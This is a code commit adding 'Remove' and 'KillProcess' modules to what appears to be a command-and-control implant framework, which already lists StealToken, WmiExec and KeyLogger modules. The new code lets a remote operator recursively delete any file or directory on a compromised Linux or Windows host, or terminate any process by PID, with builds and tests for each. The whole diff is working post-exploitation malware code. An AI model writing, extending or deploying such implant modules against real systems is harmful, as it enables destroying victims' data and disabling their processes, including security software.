Add Remove and KillProcess modules

Author: maxDcb

modules/CMakeLists.txt

@@ -30,6 +30,8 @@ add_subdirectory(StealToken)
 add_subdirectory(Upload)
 add_subdirectory(Cat)
 add_subdirectory(MkDir)
+add_subdirectory(Remove)
+add_subdirectory(KillProcess)
 add_subdirectory(Tree)
 add_subdirectory(WmiExec)
 add_subdirectory(KeyLogger)

modules/KillProcess/CMakeLists.txt

@@ -0,0 +1,16 @@
+include_directories(../)
+add_library(KillProcess SHARED KillProcess.cpp)
+set_property(TARGET KillProcess PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(KillProcess )
+add_custom_command(TARGET KillProcess POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy
+    $<TARGET_FILE:KillProcess> "${CMAKE_SOURCE_DIR}/Release/Modules/$<TARGET_FILE_NAME:KillProcess>"
+)
+
+if(WITH_TESTS)
+    add_executable(testsKillProcess tests/testsKillProcess.cpp KillProcess.cpp)
+    target_link_libraries(testsKillProcess )
+    add_custom_command(TARGET testsKillProcess POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy
+        $<TARGET_FILE:testsKillProcess> "${CMAKE_SOURCE_DIR}/Tests/$<TARGET_FILE_NAME:testsKillProcess>")
+
+    add_test(NAME testsKillProcess COMMAND "${CMAKE_SOURCE_DIR}/Tests/$<TARGET_FILE_NAME:testsKillProcess>")
+endif()

modules/KillProcess/KillProcess.cpp

@@ -0,0 +1,113 @@
+#include "KillProcess.hpp"
+
+#include "Common.hpp"
+
+#include <cstring>
+#ifdef __linux__
+#include <signal.h>
+#include <unistd.h>
+#elif _WIN32
+#include <windows.h>
+#endif
+
+using namespace std;
+
+constexpr std::string_view moduleName = "killProcess";
+constexpr unsigned long long moduleHash = djb2(moduleName);
+
+#ifdef _WIN32
+__declspec(dllexport) KillProcess* KillProcessConstructor()
+{
+    return new KillProcess();
+}
+#else
+__attribute__((visibility("default"))) KillProcess* KillProcessConstructor()
+{
+    return new KillProcess();
+}
+#endif
+
+KillProcess::KillProcess()
+#ifdef BUILD_TEAMSERVER
+    : ModuleCmd(std::string(moduleName), moduleHash)
+#else
+    : ModuleCmd("", moduleHash)
+#endif
+{
+}
+
+KillProcess::~KillProcess()
+{
+}
+
+std::string KillProcess::getInfo()
+{
+    std::string info;
+#ifdef BUILD_TEAMSERVER
+    info += "killProcess Module:\n";
+    info += "Terminate a process by PID.\n";
+    info += "\nUsage:\n";
+    info += " - killProcess <pid>\n";
+#endif
+    return info;
+}
+
+int KillProcess::init(std::vector<std::string> &splitedCmd, C2Message &c2Message)
+{
+#if defined(BUILD_TEAMSERVER) || defined(BUILD_TESTS)
+    if (splitedCmd.size() >= 2)
+    {
+        c2Message.set_instruction(splitedCmd[0]);
+        c2Message.set_pid(std::stoi(splitedCmd[1]));
+    }
+    else
+    {
+        c2Message.set_returnvalue(getInfo());
+        return -1;
+    }
+#endif
+    return 0;
+}
+
+#define ERROR_KILL_PROCESS 1
+int KillProcess::process(C2Message &c2Message, C2Message &c2RetMessage)
+{
+    int pid = c2Message.pid();
+    c2RetMessage.set_instruction(c2RetMessage.instruction());
+    c2RetMessage.set_pid(pid);
+#ifdef __linux__
+    if (kill(pid, SIGKILL) == 0)
+    {
+        c2RetMessage.set_returnvalue("Killed.");
+    }
+    else
+    {
+        c2RetMessage.set_errorCode(ERROR_KILL_PROCESS);
+    }
+#elif _WIN32
+    HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
+    if (hProcess)
+    {
+        BOOL ok = TerminateProcess(hProcess, 1);
+        CloseHandle(hProcess);
+        if (ok)
+            c2RetMessage.set_returnvalue("Killed.");
+        else
+            c2RetMessage.set_errorCode(ERROR_KILL_PROCESS);
+    }
+    else
+    {
+        c2RetMessage.set_errorCode(ERROR_KILL_PROCESS);
+    }
+#endif
+    return 0;
+}
+
+int KillProcess::errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg)
+{
+#ifdef BUILD_TEAMSERVER
+    if (c2RetMessage.errorCode() == ERROR_KILL_PROCESS)
+        errorMsg = "Failed: Could not kill process";
+#endif
+    return 0;
+}

modules/KillProcess/KillProcess.hpp

@@ -0,0 +1,23 @@
+#pragma once
+
+#include "ModuleCmd.hpp"
+
+class KillProcess : public ModuleCmd
+{
+public:
+    KillProcess();
+    ~KillProcess();
+
+    std::string getInfo();
+
+    int init(std::vector<std::string>& splitedCmd, C2Message& c2Message);
+    int process(C2Message& c2Message, C2Message& c2RetMessage);
+    int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg);
+    int osCompatibility() {return OS_LINUX | OS_WINDOWS;}
+};
+
+#ifdef _WIN32
+extern "C" __declspec(dllexport) KillProcess * KillProcessConstructor();
+#else
+extern "C"  __attribute__((visibility("default"))) KillProcess * KillProcessConstructor();
+#endif

modules/KillProcess/tests/testsKillProcess.cpp

@@ -0,0 +1,64 @@
+#include "../KillProcess.hpp"
+#include "../../ModuleCmd/Tools.hpp"
+#include <chrono>
+#include <thread>
+#ifdef __linux__
+#include <signal.h>
+#include <sys/wait.h>
+#elif _WIN32
+#include <windows.h>
+#endif
+
+bool testKillProcess();
+
+int main()
+{
+    bool res;
+    std::cout << "[+] testKillProcess" << std::endl;
+    res = testKillProcess();
+    if (res)
+        std::cout << "[+] Sucess" << std::endl;
+    else
+        std::cout << "[-] Failed" << std::endl;
+
+    return !res;
+}
+
+bool testKillProcess()
+{
+    bool ok = true;
+
+    int pid;
+#ifdef __linux__
+    pid = launchProcess("sleep 30");
+    std::this_thread::sleep_for(std::chrono::seconds(1));
+#elif _WIN32
+    pid = launchProcess("C:\\Windows\\System32\\notepad.exe");
+    Sleep(1000);
+#endif
+
+    KillProcess kp;
+    std::vector<std::string> cmd = {"killProcess", std::to_string(pid)};
+    C2Message msg, ret;
+    kp.init(cmd, msg);
+    msg.set_pid(pid);
+    kp.process(msg, ret);
+
+#ifdef __linux__
+    ok &= ret.errorCode() == -1;
+#elif _WIN32
+    HANDLE h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
+    if (h)
+    {
+        DWORD code = 0;
+        bool alive = GetExitCodeProcess(h, &code) && code == STILL_ACTIVE;
+        CloseHandle(h);
+        ok &= !alive;
+    }
+    else
+    {
+        ok &= true;
+    }
+#endif
+    return ok;
+}

modules/Remove/CMakeLists.txt

@@ -0,0 +1,16 @@
+include_directories(../)
+add_library(Remove SHARED Remove.cpp)
+set_property(TARGET Remove PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(Remove )
+add_custom_command(TARGET Remove POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy
+    $<TARGET_FILE:Remove> "${CMAKE_SOURCE_DIR}/Release/Modules/$<TARGET_FILE_NAME:Remove>"
+)
+
+if(WITH_TESTS)
+    add_executable(testsRemove tests/testsRemove.cpp Remove.cpp)
+    target_link_libraries(testsRemove )
+    add_custom_command(TARGET testsRemove POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy
+        $<TARGET_FILE:testsRemove> "${CMAKE_SOURCE_DIR}/Tests/$<TARGET_FILE_NAME:testsRemove>")
+
+    add_test(NAME testsRemove COMMAND "${CMAKE_SOURCE_DIR}/Tests/$<TARGET_FILE_NAME:testsRemove>")
+endif()

modules/Remove/Remove.cpp

@@ -0,0 +1,102 @@
+#include "Remove.hpp"
+
+#include "Common.hpp"
+
+#include <filesystem>
+#include <cstring>
+
+using namespace std;
+namespace fs = std::filesystem;
+
+constexpr std::string_view moduleName = "remove";
+constexpr unsigned long long moduleHash = djb2(moduleName);
+
+#ifdef _WIN32
+__declspec(dllexport) Remove* RemoveConstructor()
+{
+    return new Remove();
+}
+#else
+__attribute__((visibility("default"))) Remove* RemoveConstructor()
+{
+    return new Remove();
+}
+#endif
+
+Remove::Remove()
+#ifdef BUILD_TEAMSERVER
+    : ModuleCmd(std::string(moduleName), moduleHash)
+#else
+    : ModuleCmd("", moduleHash)
+#endif
+{
+}
+
+Remove::~Remove()
+{
+}
+
+std::string Remove::getInfo()
+{
+    std::string info;
+#ifdef BUILD_TEAMSERVER
+    info += "remove Module:\n";
+    info += "Delete a file or directory.\n";
+    info += "\nUsage:\n";
+    info += " - remove <path>\n";
+#endif
+    return info;
+}
+
+int Remove::init(std::vector<std::string> &splitedCmd, C2Message &c2Message)
+{
+#if defined(BUILD_TEAMSERVER) || defined(BUILD_TESTS)
+    if (splitedCmd.size() >= 2)
+    {
+        std::string path;
+        for (size_t i = 1; i < splitedCmd.size(); ++i)
+        {
+            if (!path.empty())
+                path += " ";
+            path += splitedCmd[i];
+        }
+        c2Message.set_instruction(splitedCmd[0]);
+        c2Message.set_cmd(path);
+    }
+    else
+    {
+        c2Message.set_returnvalue(getInfo());
+        return -1;
+    }
+#endif
+    return 0;
+}
+
+#define ERROR_REMOVE 1
+int Remove::process(C2Message &c2Message, C2Message &c2RetMessage)
+{
+    std::string path = c2Message.cmd();
+    c2RetMessage.set_instruction(c2RetMessage.instruction());
+    c2RetMessage.set_cmd(path);
+
+    std::error_code ec;
+    fs::remove_all(path, ec);
+    if (!ec)
+    {
+        c2RetMessage.set_returnvalue("Removed.");
+    }
+    else
+    {
+        c2RetMessage.set_errorCode(ERROR_REMOVE);
+    }
+    return 0;
+}
+
+int Remove::errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg)
+{
+#ifdef BUILD_TEAMSERVER
+    if (c2RetMessage.errorCode() == ERROR_REMOVE)
+        errorMsg = "Failed: Could not remove path";
+#endif
+    return 0;
+}

modules/Remove/Remove.hpp

@@ -0,0 +1,23 @@
+#pragma once
+
+#include "ModuleCmd.hpp"
+
+class Remove : public ModuleCmd
+{
+public:
+    Remove();
+    ~Remove();
+
+    std::string getInfo();
+
+    int init(std::vector<std::string>& splitedCmd, C2Message& c2Message);
+    int process(C2Message& c2Message, C2Message& c2RetMessage);
+    int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg);
+    int osCompatibility() {return OS_LINUX | OS_WINDOWS;}
+};
+
+#ifdef _WIN32
+extern "C" __declspec(dllexport) Remove * RemoveConstructor();
+#else
+extern "C"  __attribute__((visibility("default"))) Remove * RemoveConstructor();
+#endif